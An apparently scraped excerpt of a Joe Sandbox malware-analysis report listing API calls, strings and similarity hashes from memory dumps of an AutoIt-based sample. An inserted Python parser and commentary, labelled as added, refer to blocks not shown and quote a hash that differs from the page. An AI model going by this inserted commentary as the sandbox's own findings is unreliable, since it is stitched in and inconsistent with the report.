Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: c70b9aeb7679db739137f3a973e01b3f889cd35ebde0449aca8e455561951438
• Instruction ID: 35974c3e1fe33497a290b024ad34b582034756c94a753c14e8be2b513f92ba84
• Opcode Fuzzy Hash: c70b9aeb7679db739137f3a973e01b3f889cd35ebde0449aca8e455561951438
• Instruction Fuzzy Hash: 24F0F475A4121866CB04F3A89C52FFE776CAF41390F400915B922A32C1DB74690CC7A0
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009F146F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Message
• String ID: AutoIt$Error allocating memory.
• API String ID: 2030045667-4017498283
• Opcode ID: c2aaa4c333e7cec11d43958cf8405cdd70acf54fb6bbdf800ca12ffdb85dd683
• Instruction ID: ea4abb7713bd68bc96a4609a487274110496a6e4ffffb275fcf2722de2a66409
• Opcode Fuzzy Hash: c2aaa4c333e7cec11d43958cf8405cdd70acf54fb6bbdf800ca12ffdb85dd683
• Instruction Fuzzy Hash: 2FE0D83124C3283AD624279CBC03FD976849F45B71F11482AF748694C34EF2649042D9
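The function blocks above are machine-generated records: an "APIs" list of the calls found in the dumped code (entries marked "Part of subcall function" are inherited from a callee), and a "Similarity" section whose API ID, String ID and fuzzy hashes are what the sandbox uses to match a block against known code. The four SendMessageW blocks share one API ID and the strings ComboBox$ListBox and differ only in the message number, which the report prints as a raw hex value. The following is an added example, not part of the Joe Sandbox report: a small Python parser that turns these records into structured rows and names the constants. The message and flag names come from the Windows SDK header winuser.h (0x180 LB_ADDSTRING, 0x182 LB_DELETESTRING, 0x18B LB_GETCOUNT, 0x1A2 LB_FINDSTRINGEXACT; MessageBoxW type 0x10 is MB_ICONERROR). Taken together with the "AutoIt" caption in the MessageBoxW block, these decode as ListBox/ComboBox control handling that is consistent with the AutoIt runtime rather than with the payload families named in the detection summary, which is a useful hint when deciding which blocks in process 10 deserve manual reversing time. The sample text embedded below is constructed from two of the blocks on this page.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Window-message and MessageBox flag values from the Windows SDK (winuser.h).
# Only the values that occur in the records on this page are tabulated; a
# value outside the table is reported as "unknown" rather than guessed.
LB_MESSAGES = {
    0x0180: "LB_ADDSTRING",
    0x0182: "LB_DELETESTRING",
    0x018B: "LB_GETCOUNT",
    0x01A2: "LB_FINDSTRINGEXACT",
}
MB_FLAGS = {0x00000010: "MB_ICONERROR"}

# One "APIs" entry in the report's own notation, for example
#   Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
#   FreeLibrary.KERNEL32 ref: 009EE7BD
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<subaddr>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]                    # argument tokens as printed; "?" = not resolved
    ref: str                           # address of the call site in the dump
    via_subcall: Optional[str] = None  # callee address when inherited from a subcall


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    string_id: str = ""
    insn_fuzzy_hash: str = ""


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split a listing into function blocks, one per 'APIs' header.

    Indentation and bullet glyphs are stripped, so text can be pasted straight
    from the report. Arguments are split on ',', which is safe for the records
    on this page because no argument string contains a comma.
    """
    blocks: List[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            section = "APIs"
            continue
        if cur is None:
            continue
        if line in ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = line
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
                cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["subaddr"]))
        elif section == "Similarity":
            key, _, value = line.partition(": ")
            if key == "String ID":
                cur.string_id = value
            elif key == "Instruction Fuzzy Hash":
                cur.insn_fuzzy_hash = value
    return blocks


def describe(call: ApiCall) -> str:
    """Render one call, naming the USER32 constant where the report resolved it."""
    if call.name == "SendMessageW" and len(call.args) >= 2 and call.args[1] != "?":
        msg = int(call.args[1], 16)
        return f"SendMessageW msg=0x{msg:04X} ({LB_MESSAGES.get(msg, 'unknown')}) at {call.ref}"
    if call.name == "MessageBoxW" and len(call.args) == 4 and call.args[3] != "?":
        flags = int(call.args[3], 16)
        names = [n for v, n in MB_FLAGS.items() if flags & v] or ["none"]
        return (f"MessageBoxW caption={call.args[2]!r} text={call.args[1]!r} "
                f"flags={'|'.join(names)} at {call.ref}")
    via = f" (via subcall {call.via_subcall})" if call.via_subcall else ""
    return f"{call.name}.{call.module} at {call.ref}{via}"


# Constructed from two of the function blocks on this page (left margin removed).
SAMPLE = """
APIs
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
  • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009F2699
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• Instruction Fuzzy Hash: D801D475A41218ABCF04EBA8CC55EFE7768FF86360B400A1AB932972C1DA35590DCB50
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009F146F
Strings
Similarity
• API ID: Message
• String ID: AutoIt$Error allocating memory.
• Instruction Fuzzy Hash: 2FE0D83124C3283AD624279CBC03FD976849F45B71F11482AF748694C34EF2649042D9
"""

if __name__ == "__main__":
    for block in parse_blocks(SAMPLE):
        print(f"block string_id={block.string_id!r} insn_hash={block.insn_fuzzy_hash[:16]}...")
        for call in block.calls:
            print("   ", describe(call))
```

Running it on the full listing for process 10 (paste the report section into SAMPLE or read it from a file) groups every block by its String ID and Instruction Fuzzy Hash, so the repeated ComboBox$ListBox blocks can be collapsed into one line each and the analyst's attention goes to blocks whose API set does not look like GUI runtime code.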
APIs
• GetProcAddress.KERNEL32(5600A586,?), ref: 009EE797
• FreeLibrary.KERNEL32 ref: 009EE7BD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: X64
• API String ID: 3013587201-893830106
APIs
  • Part of subcall function 009AFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009B10E2,?,?,?,0099100A), ref: 009AFAD9
• IsDebuggerPresent.KERNEL32(?,?,?,0099100A), ref: 009B10E6
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0099100A), ref: 009B10F5
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009B10F0
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 55579361-631824599
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00A039F0
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00A03A05
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A22DC8
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A22DDB
  • Part of subcall function 009FF292: Sleep.KERNEL32 ref: 009FF30A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A22E08
• PostMessageW.USER32(00000000), ref: 00A22E0F
  • Part of subcall function 009FF292: Sleep.KERNEL32 ref: 009FF30A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 009CC213
• GetLastError.KERNEL32 ref: 009CC221
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009CC27C
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                  • Opcode ID: b818e9bb745899b6beb1593f2b02be8e0cd1537ebd4a5af7a9f13c3787ffa45f
                                                                                                                                                                                                                                  • Instruction ID: f624dcd189f9efded51510d648426dacca5470e1b120cdca1e0b0dc5bce7a467
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b818e9bb745899b6beb1593f2b02be8e0cd1537ebd4a5af7a9f13c3787ffa45f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B441B4B1E00205ABDB218FE5C844FAA7FA9AF51720F2441ADE86DA71A1DB30DD01C762